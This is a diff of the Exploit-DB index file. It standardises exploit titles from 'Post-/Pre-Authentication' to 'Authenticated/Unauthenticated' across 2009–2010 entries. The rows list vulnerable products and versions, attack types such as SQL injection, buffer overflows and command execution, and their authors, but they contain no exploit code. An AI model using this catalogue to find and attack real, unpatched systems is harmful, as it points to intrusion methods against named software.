 8210,platforms/php/webapps/8210.txt,"UBB.Threads 5.5.1 - (message) SQL Injection",2009-03-16,s4squatch,php,webapps,0
 8211,platforms/windows/remote/8211.pl,"Serv-U 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0
-8212,platforms/windows/dos/8212.pl,"Serv-U 7.4.0.1 - (SMNT) Post-Authentication Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0
+8212,platforms/windows/dos/8212.pl,"Serv-U 7.4.0.1 - (SMNT) Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0
 8213,platforms/windows/dos/8213.pl,"VLC 0.9.8a - Web UI (input) Remote Denial of Service",2009-03-16,TheLeader,windows,dos,0
 8214,platforms/windows/local/8214.c,"Rosoft Media Player 4.2.1 - Local Buffer Overflow (multi target)",2009-03-16,SimO-s0fT,windows,local,0
 8215,platforms/windows/remote/8215.txt,"PPLive 1.9.21 - (/LoadModule) URI Handlers Argument Injection",2009-03-16,Nine:Situations:Group,windows,remote,0
@@ -7760,7 +7759,7 @@ id,file,description,date,author,platform,type,port
 8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Injection / Command Injection (via Cookie Bypass Exploit)",2009-03-19,Fireshot,php,webapps,0
 8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",multiple,dos,0
 8246,platforms/windows/local/8246.pl,"Chasys Media Player - '.lst Playlist' Local Buffer Overflow",2009-03-19,zAx,windows,local,0
-8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - (Post-Authentication) Command Execution",2009-03-19,"Emory University",cgi,webapps,0
+8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - (Authenticated) Command Execution",2009-03-19,"Emory University",cgi,webapps,0
 8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - (From) Remote Buffer Overflow (SEH)",2009-03-20,His0k4,windows,remote,0
 8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0
 8250,platforms/windows/local/8250.txt,"CloneCD/DVD ElbyCDIO.sys < 6.0.3.2 - Privilege Escalation",2009-03-20,"NT Internals",windows,local,0
@@ -7786,7 +7785,7 @@ id,file,description,date,author,platform,type,port
 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow",2009-03-23,Koshi,windows,local,0
 8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - (module_pages_site.php post) Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0
 8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - SQL Command Execution",2009-03-23,darkjoker,php,webapps,0
-8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Post-Authentication) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0
+8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0
 8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 - '.eml' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0
 8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 - '.html' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0
 8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection",2009-03-23,Osirys,php,webapps,0
@@ -7796,7 +7795,7 @@ id,file,description,date,author,platform,type,port
 8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)",2009-03-24,"Black Security",windows,local,0
 8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus - EMF GpFont.SetData Integer Overflow (PoC)",2009-03-24,"Black Security",windows,dos,0
 8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 - (view.php id) SQL Injection",2009-03-24,x0r,php,webapps,0
-8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - (Post-Authentication) Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0
+8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0
 8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (Cross-Site Scripting) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0
 8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (1)",2009-03-25,"Guido Landi",multiple,dos,0
 8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload",2009-03-25,EgiX,php,webapps,0
@@ -7862,7 +7861,7 @@ id,file,description,date,author,platform,type,port
 8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0
 8348,platforms/php/webapps/8348.txt,"form2list - 'page.php id' SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0
 8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",php,webapps,0
-8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0b - SQL Injection / Post-Authentication Code Execution",2009-04-03,brain[pillow],php,webapps,0
+8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0b - SQL Injection / Authenticated Code Execution",2009-04-03,brain[pillow],php,webapps,0
 8351,platforms/php/webapps/8351.pl,"AdaptBB 1.0 - (topic_id) SQL Injection / Credentials Disclosure",2009-04-03,StAkeR,php,webapps,0
 8352,platforms/windows/dos/8352.txt,"Amaya 11.1 - XHTML Parser Remote Buffer Overflow (PoC)",2009-04-06,cicatriz,windows,dos,0
 8353,platforms/php/webapps/8353.txt,"Joomla Component com_bookjoomlas 0.1 - SQL Injection",2009-04-06,"Salvatore Fresta",php,webapps,0
@@ -7978,7 +7977,7 @@ id,file,description,date,author,platform,type,port
 8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin - '.png' Infinite Loop Denial of Service (PoC)",2009-04-17,"Code Audit Labs",windows,dos,0
 8467,platforms/windows/dos/8467.pl,"Microsoft Media Player - (quartz.dll .wav) Multiple Remote Denial of Service Vulnerabilities",2009-04-17,"Code Audit Labs",windows,dos,0
 8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - Cross-Site Request Forgery Privilege Escalation (PoC)",2009-04-17,"Alfons Luja",php,webapps,0
-8469,platforms/linux/dos/8469.c,"XRDP 0.4.1 - Pre-Authentication Remote Buffer Overflow (PoC)",2009-04-17,"joe walko",linux,dos,0
+8469,platforms/linux/dos/8469.c,"XRDP 0.4.1 - Unauthenticated Remote Buffer Overflow (PoC)",2009-04-17,"joe walko",linux,dos,0
 8470,platforms/linux/local/8470.py,"cTorrent/DTorrent - '.torrent' Buffer Overflow",2009-04-17,"Michael Brooks",linux,local,0
 8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0
 8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - (Authentication Bypass) SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0
@@ -7999,7 +7998,7 @@ id,file,description,date,author,platform,type,port
 8487,platforms/php/webapps/8487.txt,"EZ Webitor - (Authentication Bypass) SQL Injection",2009-04-20,snakespc,php,webapps,0
 8488,platforms/php/webapps/8488.pl,"Pligg 9.9.0 - (editlink.php id) Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps,0
 8489,platforms/windows/dos/8489.pl,"CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,windows,dos,0
-8490,platforms/hardware/dos/8490.sh,"Addonics NAS Adapter - 'bts.cgi' Post-Authentication Remote Denial of Service",2009-04-20,h00die,hardware,dos,0
+8490,platforms/hardware/dos/8490.sh,"Addonics NAS Adapter - 'bts.cgi' Authenticated Remote Denial of Service",2009-04-20,h00die,hardware,dos,0
 8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b - (Insecure Cookie Handling) Blind SQL Injection",2009-04-20,YEnH4ckEr,php,webapps,0
 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0
 8493,platforms/php/webapps/8493.txt,"fungamez rc1 - (Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities",2009-04-20,YEnH4ckEr,php,webapps,0
@@ -8526,7 +8525,7 @@ id,file,description,date,author,platform,type,port
 9036,platforms/php/webapps/9036.txt,"PHP-Sugar 0.80 - (index.php t) Local File Inclusion",2009-06-29,ahmadbady,php,webapps,0
 9037,platforms/php/webapps/9037.txt,"Clicknet CMS 2.1 - (side) Arbitrary File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0
 9038,platforms/windows/local/9038.py,"HT-MP3Player 1.0 - '.ht3' Universal Buffer Overflow (SEH)",2009-06-29,His0k4,windows,local,0
-9039,platforms/multiple/remote/9039.txt,"Cpanel - (Post-Authentication) (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0
+9039,platforms/multiple/remote/9039.txt,"Cpanel - (Authenticated) (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0
 9040,platforms/php/webapps/9040.txt,"Joomla com_bookflip - (book_id) SQL Injection",2009-06-29,boom3rang,php,webapps,0
 9041,platforms/php/webapps/9041.txt,"Audio Article Directory - (file) Remote File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0
 9042,platforms/php/webapps/9042.pl,"NEWSolved 1.1.6 - (login grabber) Multiple SQL Injection",2009-06-29,jmp-esp,php,webapps,0
@@ -8569,7 +8568,7 @@ id,file,description,date,author,platform,type,port
 9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
 9083,platforms/linux/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off-by-One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution (PoC)",2009-07-09,"laurent gaffié ",windows,dos,0
-9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - (Post-Authentication) COM_CREATE_DB Format String PoC",2009-07-09,kingcope,multiple,dos,0
+9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - (Authenticated) COM_CREATE_DB Format String PoC",2009-07-09,kingcope,multiple,dos,0
 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Arbitrary File Upload",2009-07-09,"ThE g0bL!N",php,webapps,0
 9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password",2009-07-09,rEcruit,php,webapps,0
 9088,platforms/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,php,webapps,0
@@ -8909,7 +8908,7 @@ id,file,description,date,author,platform,type,port
 9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 - (nFileId) SQL Injection",2009-08-14,Mr.tro0oqy,php,webapps,0
 9441,platforms/php/webapps/9441.txt,"MyWeight 1.0 - Arbitrary File Upload",2009-08-14,Mr.tro0oqy,php,webapps,0
 9442,platforms/linux/dos/9442.c,"Linux Kernel < 2.6.30.5 - 'cfg80211' Remote Denial of Service",2009-08-18,"Jon Oberheide",linux,dos,0
-9443,platforms/windows/remote/9443.txt,"Adobe JRun 4 - (logfile) Post-Authentication Directory Traversal",2009-08-18,DSecRG,windows,remote,0
+9443,platforms/windows/remote/9443.txt,"Adobe JRun 4 - (logfile) Authenticated Directory Traversal",2009-08-18,DSecRG,windows,remote,0
 9444,platforms/php/webapps/9444.txt,"PHP-Lance 1.52 - Multiple Local File Inclusion",2009-08-18,jetli007,php,webapps,0
 9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection",2009-08-18,"Khashayar Fereidani",php,webapps,0
 9446,platforms/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH)",2009-08-18,"fl0 fl0w",windows,dos,0
@@ -9125,7 +9124,7 @@ id,file,description,date,author,platform,type,port
 9661,platforms/windows/local/9661.c,"MP3 Studio 1.0 - '.m3u' Local Buffer Overflow",2009-09-14,dmc,windows,local,0
 9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow",2009-09-14,dmc,windows,remote,143
 9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow",2009-09-14,dmc,windows,remote,0
-9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - (Post-Authentication) Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0
+9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0
 9665,platforms/php/webapps/9665.pl,"PHP Pro Bid - Blind SQL Injection",2009-09-14,NoGe,php,webapps,0
 9666,platforms/hardware/dos/9666.php,"Apple Safari IPhone - (using tel:) Remote Crash",2009-09-14,cloud,hardware,dos,0
 9667,platforms/windows/dos/9667.c,"Cerberus FTP Server 3.0.3 - Remote Denial of Service",2009-09-14,"Single Eye",windows,dos,0
@@ -9147,7 +9146,7 @@ id,file,description,date,author,platform,type,port
 9685,platforms/windows/dos/9685.txt,"EasyMail Quicksoft 6.0.2.0 - (CreateStore) ActiveX Code Execution (PoC)",2009-09-15,"Francis Provencher",windows,dos,0
 9686,platforms/windows/dos/9686.py,"VLC Media Player < 0.9.6 - (CUE) Local Buffer Overflow (PoC)",2009-09-15,Dr_IDE,windows,dos,0
 9687,platforms/windows/local/9687.py,"SAP Player 0.9 - '.pla' Universal Local Buffer Overflow (SEH)",2009-09-15,mr_me,windows,local,0
-9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - (Post-Authentication) (ping option) Command Injection",2009-09-15,r00t,hardware,local,0
+9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - (Authenticated) (ping option) Command Injection",2009-09-15,r00t,hardware,local,0
 9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 - '.m3u' Local Crash (PoC)",2009-09-15,zAx,windows,dos,0
 9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH) Universal",2009-09-15,hack4love,windows,remote,6660
 9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 - '.pls' Local Crash",2009-09-15,prodigy,windows,dos,0
@@ -9306,7 +9305,7 @@ id,file,description,date,author,platform,type,port
 9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow (Metasploit)",2002-06-10,noir,solaris,remote,6112
 9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)",2003-04-07,"H D Moore",osx,remote,139
 9925,platforms/osx/remote/9925.rb,"Apple QuickTime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0
-9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 - tinybrowser Arbitrary File Upload / Execute",2009-07-22,spinbad,php,webapps,0
+9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 tinybrowser - Arbitrary File Upload /Execution",2009-07-22,spinbad,php,webapps,0
 9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0
 9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server 5.3.2 (OSX) - USER Overflow (Metasploit)",2004-07-13,ddz,osx,remote,21
 9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)",2006-03-01,"H D Moore",osx,remote,25
@@ -9372,7 +9371,7 @@ id,file,description,date,author,platform,type,port
 9995,platforms/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",multiple,remote,0
 9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - '.blend' Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0
 9998,platforms/windows/remote/9998.c,"BulletProof FTP 2.63 b56 - Client Malformed '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",windows,remote,21
-9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Pre-Authentication Denial of Service",2009-09-30,"Francis Provencher",windows,dos,21
+9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Unauthenticated Denial of Service",2009-09-30,"Francis Provencher",windows,dos,21
 10000,platforms/hardware/remote/10000.txt,"Cisco ACE XML Gateway 6.0 - Internal IP Disclosure",2009-09-25,nitr0us,hardware,remote,0
 10001,platforms/multiple/remote/10001.txt,"CUPS - 'kerberos' Parameter Cross-Site Scripting",2009-11-11,"Aaron Sigel",multiple,remote,80
 10002,platforms/php/webapps/10002.txt,"CuteNews and UTF-8 CuteNews - Multiple Security Vulnerabilities",2009-11-10,"Andrew Horton",php,webapps,0
@@ -9672,7 +9671,7 @@ id,file,description,date,author,platform,type,port
 10391,platforms/php/webapps/10391.txt,"XAMPP 1.7.2 - Change Administrative Password",2009-12-11,bi0,php,webapps,0
 10392,platforms/windows/local/10392.rb,"Millenium MP3 Studio 2.0 - '.pls' Universal Stack Overflow (Metasploit)",2009-12-11,dookie,windows,local,0
 10393,platforms/php/webapps/10393.txt,"B2C Booking Centre Systems - SQL Injection",2009-12-11,"Salvatore Fresta",php,webapps,0
-10394,platforms/windows/remote/10394.py,"HP NNM 7.53 - ovalarm.exe CGI Pre-Authentication Remote Buffer Overflow",2009-12-12,"sinn3r and muts",windows,remote,80
+10394,platforms/windows/remote/10394.py,"HP NNM 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow",2009-12-12,"sinn3r and muts",windows,remote,80
 14948,platforms/php/webapps/14948.txt,"festos CMS 2.3b - Multiple Vulnerabilities",2010-09-09,Abysssec,php,webapps,0
 10395,platforms/php/webapps/10395.txt,"Miniweb 2.0 - Full Path Disclosure",2009-12-12,"Salvatore Fresta",php,webapps,0
 10396,platforms/linux/local/10396.pl,"Mozilla Codesighs - Memory Corruption (PoC)",2009-12-12,"Jeremy Brown",linux,local,0
@@ -10149,7 +10148,7 @@ id,file,description,date,author,platform,type,port
 11019,platforms/php/webapps/11019.txt,"MobPartner Counter - Arbitrary File Upload",2010-01-06,"wlhaan hacker",php,webapps,0
 11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0
 11021,platforms/windows/dos/11021.txt,"Flashget 3.x - IEHelper Remote Exec (PoC)",2010-01-06,superli,windows,dos,0
-11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Post-Authentication) Remote Buffer Overflow",2010-01-06,"His0k4 and Simo36",novell,remote,0
+11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow",2010-01-06,"His0k4 and Simo36",novell,remote,0
 11023,platforms/asp/webapps/11023.txt,"Erolife AjxGaleri VT - Database Disclosure",2010-01-06,LionTurk,asp,webapps,0
 11024,platforms/php/webapps/11024.txt,"Joomla Component com_perchagallery - SQL Injection",2010-01-06,FL0RiX,php,webapps,0
 11025,platforms/php/webapps/11025.txt,"AWCM - Database Disclosure",2010-01-06,alnjm33,php,webapps,0
@@ -10399,7 +10398,7 @@ id,file,description,date,author,platform,type,port
 11340,platforms/php/webapps/11340.txt,"odlican.net CMS 1.5 - Arbitrary File Upload",2010-02-06,anonymous,php,webapps,0
 11341,platforms/php/webapps/11341.txt,"ShopEx Single 4.5.1 - Multiple Vulnerabilities",2010-02-06,"cp77fk4r ",php,webapps,0
 11342,platforms/windows/dos/11342.txt,"SQLite Browser 2.0b1 - Local Denial of Service",2010-02-06,"Nishant Das Patnaik",windows,dos,0
-11343,platforms/windows/dos/11343.py,"httpdx 1.5.2 - Remote Pre-Authentication Denial of Service (PoC)",2010-02-07,loneferret,windows,dos,0
+11343,platforms/windows/dos/11343.py,"httpdx 1.5.2 - Remote Unauthenticated Denial of Service (PoC)",2010-02-07,loneferret,windows,dos,0
 11344,platforms/php/webapps/11344.txt,"WSN Guest - Database Disclosure",2010-02-07,"HackXBack ",php,webapps,0
 11345,platforms/php/webapps/11345.txt,"Zen Tracking 2.2 - (Authentication Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0
 11346,platforms/php/webapps/11346.txt,"Baal Systems 3.8 - (Authentication Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0
@@ -10437,7 +10436,7 @@ id,file,description,date,author,platform,type,port
 11383,platforms/php/webapps/11383.txt,"HASHE! Solutions - Multiple SQL Injections",2010-02-10,"AtT4CKxT3rR0r1ST ",php,webapps,0
 11384,platforms/windows/local/11384.py,"WM Downloader 3.0.0.9 (Windows XP SP3) - PLS PLA Exploit",2010-02-10,"Beenu Arora",windows,local,0
 11385,platforms/php/webapps/11385.txt,"ULoki Community Forum 2.1 - (usercp.php) Cross-Site Scripting",2010-02-10,"Sioma Labs",php,webapps,0
-11391,platforms/windows/dos/11391.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Crash (PoC)",2010-02-10,loneferret,windows,dos,0
+11391,platforms/windows/dos/11391.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Crash (PoC)",2010-02-10,loneferret,windows,dos,0
 11392,platforms/windows/dos/11392.c,"RadASM 2.2.1.6 - '.rap' Local Buffer Overflow (PoC)",2010-02-11,"fl0 fl0w",windows,dos,0
 11393,platforms/jsp/webapps/11393.txt,"Omnidocs - SQL Injection",2010-02-11,thebluegenius,jsp,webapps,0
 11394,platforms/php/webapps/11394.txt,"vBulletin 3.5.2 - Cross-Site Scripting",2010-02-11,ROOT_EGY,php,webapps,0
@@ -10463,7 +10462,7 @@ id,file,description,date,author,platform,type,port
 11414,platforms/asp/webapps/11414.txt,"Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities",2010-02-12,SpeeDr00t,asp,webapps,0
 11415,platforms/php/webapps/11415.txt,"Izumi 1.1.0 - (Remote File Inclusion / Local File Inclusion) Multiple Include",2010-02-12,"cr4wl3r ",php,webapps,0
 11416,platforms/php/webapps/11416.txt,"Alqatari Group 1.0 - Blind SQL Injection",2010-02-12,Red-D3v1L,php,webapps,0
-11420,platforms/windows/remote/11420.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Remote Exploit",2010-02-12,Lincoln,windows,remote,0
+11420,platforms/windows/remote/11420.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote Exploit",2010-02-12,Lincoln,windows,remote,0
 11422,platforms/windows/remote/11422.rb,"Hyleos ChemView 1.9.5.1 - ActiveX Control Buffer Overflow (Metasploit)",2010-02-12,Dz_attacker,windows,remote,0
 11424,platforms/php/webapps/11424.txt,"cms made simple 1.6.6 - Multiple Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0
 11425,platforms/php/webapps/11425.txt,"daChooch - SQL Injection",2010-02-12,snakespc,php,webapps,0
@@ -10502,9 +10501,9 @@ id,file,description,date,author,platform,type,port
 11465,platforms/windows/local/11465.py,"Ollydbg 2.00 Beta1 - Local Buffer Overflow",2010-02-15,_SuBz3r0_,windows,local,0
 11466,platforms/php/webapps/11466.txt,"microUpload - Arbitrary File Upload",2010-02-15,Phenom,php,webapps,0
 11467,platforms/ios/dos/11467.py,"iOS My DBLite Edition - Remote Denial of Service",2010-02-15,"Jason Bowes",ios,dos,0
-11468,platforms/windows/remote/11468.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow",2010-02-15,dookie,windows,remote,21
-11469,platforms/windows/dos/11469.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0
-11470,platforms/windows/dos/11470.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (PoC)",2010-02-15,loneferret,windows,dos,0
+11468,platforms/windows/remote/11468.py,"Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow",2010-02-15,dookie,windows,remote,21
+11469,platforms/windows/dos/11469.py,"Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0
+11470,platforms/windows/dos/11470.py,"Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)",2010-02-15,loneferret,windows,dos,0
 11472,platforms/ios/dos/11472.py,"iOS FTP On The Go 2.1.2 - HTTP Remote Denial of Service",2010-02-15,TecR0c,ios,dos,0
 11473,platforms/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,php,webapps,0
 11474,platforms/php/webapps/11474.txt,"Mambo Component com_acnews - [id] SQL Injection",2010-02-16,"Zero Bits and Xzit3",php,webapps,0
@@ -10733,16 +10732,16 @@ id,file,description,date,author,platform,type,port
 11731,platforms/php/webapps/11731.html,"RogioBiz PHP Fle Manager 1.2 - Admin Bypass",2010-03-14,ITSecTeam,php,webapps,0
 11732,platforms/php/webapps/11732.txt,"PHP-Nuke - Local File Inclusion",2010-03-14,ITSecTeam,php,webapps,0
 11733,platforms/php/webapps/11733.txt,"PHPpool media Domain Verkaufs und Auktions Portal - 'index.php' SQL Injection",2010-03-14,"Easy Laster",php,webapps,0
-11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Pre-Authentication Denial of Service (PoC)",2010-03-14,loneferret,windows,dos,0
+11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Unauthenticated Denial of Service (PoC)",2010-03-14,loneferret,windows,dos,0
 11735,platforms/php/webapps/11735.php,"DZCP (deV!L_z Clanportal) 1.5.2 - Remote File Inclusion",2010-03-14,"cr4wl3r ",php,webapps,0
 18428,platforms/php/webapps/18428.txt,"HostBill App 2.3 - Remote Code Injection",2012-01-30,Dr.DaShEr,php,webapps,0
-11736,platforms/linux/dos/11736.py,"Kerio MailServer 6.2.2 - Pre-Authentication Remote Denial of Service (PoC)",2006-12-14,"Evgeny Legerov",linux,dos,389
+11736,platforms/linux/dos/11736.py,"Kerio MailServer 6.2.2 - Unauthenticated Remote Denial of Service (PoC)",2006-12-14,"Evgeny Legerov",linux,dos,389
 11737,platforms/php/webapps/11737.txt,"PhpMyLogon 2.0 - SQL Injection",2010-03-14,blake,php,webapps,0
 11738,platforms/php/webapps/11738.txt,"Joomla Component com_gcalendar Suite 2.1.5 - Local File Inclusion",2010-03-15,jdc,php,webapps,0
 11739,platforms/php/webapps/11739.txt,"PHP Classifieds 7.5 - Blind SQL Injection",2010-03-15,ITSecTeam,php,webapps,0
 11740,platforms/php/webapps/11740.txt,"Ninja RSS Syndicator 1.0.8 - Local File Inclusion",2010-03-15,jdc,php,webapps,0
 11741,platforms/php/webapps/11741.txt,"Phenix 3.5b - SQL Injection",2010-03-15,ITSecTeam,php,webapps,0
-11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Buffer Overflow (Metasploit)",2010-03-15,blake,windows,remote,0
+11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit)",2010-03-15,blake,windows,remote,0
 11743,platforms/php/webapps/11743.txt,"Joomla Component com_rpx Ulti RPX 2.1.0 - Local File Inclusion",2010-03-15,jdc,php,webapps,0
 11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script - Cross-Site Scripting",2010-03-15,indoushka,php,webapps,0
 11745,platforms/php/webapps/11745.txt,"FreeHost 1.00 - Arbitrary File Upload",2010-03-15,indoushka,php,webapps,0
@@ -10802,15 +10801,15 @@ id,file,description,date,author,platform,type,port
 11806,platforms/php/webapps/11806.txt,"nensor CMS 2.01 - Multiple Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0
 11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Inclusion",2010-03-18,"cr4wl3r ",php,webapps,0
 11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0
-11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP server 1.0.0 - Pre-Authentication Denial of Service (PoC)",2010-03-19,loneferret,windows,dos,21
-11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21
+11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP server 1.0.0 - Unauthenticated Denial of Service (PoC)",2010-03-19,loneferret,windows,dos,21
+11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21
